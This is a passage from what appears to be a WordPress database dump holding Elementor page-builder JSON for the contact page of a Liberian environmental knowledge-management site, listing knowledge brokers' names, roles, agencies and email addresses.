href=\\\"sasherif@nafaa.gov.lr\\\">sasherif@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Anthony A. Yokie<\\/strong>\\nManager\\nDepartment of Marine Fisheries and Environment\\nNaFAA\\n<a href=\\\"mailto:ayokie@nafaa.gov.lr\\\">ayokie@nafaa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Martin Killen <\\/strong><br \\/>IT Officer<br \\/>NaFAA<br \\/><a href=\\\"mailto:maskillen@nafaa.gov.lr\\\">maskillen@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce W. Kumeh<\\/strong><br \\/>Coastal Zone Supervisor<br \\/>NaFAA<br \\/><a href=\\\"mailto:jkumeh@nafaa.gov.lr\\\">jkumeh@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aca08f0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"08c437c\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc69fab\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"625a74e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/02\\/nafaa.png\",\"id\":3520}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"aff1f4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3690a1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b216801\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6cccf87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6a59ec5\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23ca2d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9bf0510\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Urias B. Barclay<\\/strong><br \\/>Environmental Technician<br \\/>NaFAA<br \\/><a href=\\\"mailto:ubbarclay@gmail.com\\\">ubbarclay@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0aec03\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e162bb8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9bce89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"593819f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3ef1bd5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"334f9e9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(24383,3593,'_elementor_edit_mode','builder'),(24384,3593,'_elementor_template_type','wp-page'),(24385,3593,'_elementor_version','3.0.16'),(24386,3593,'_wp_page_template','default'),(24387,3593,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/bgoll.jpg\",\"id\":3426}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong>\\n<p>EIA Manager <\\/br>FDA <\\/br>\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll<\\/strong><br \\/>Conservation Manager<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Agricultural Economist<br \\/>MOA<br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jlopleh Dennis Wiagbe <\\/strong><br \\/>Director\\/M&amp;E<br \\/>MOA<br \\/><a href=\\\"mailto:jdmne12@gmail.com\\\">jdmne12@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Halala Willie Kokulo <\\/strong><br \\/>Director\\/Crop Resources<br \\/>MOA<br \\/><a 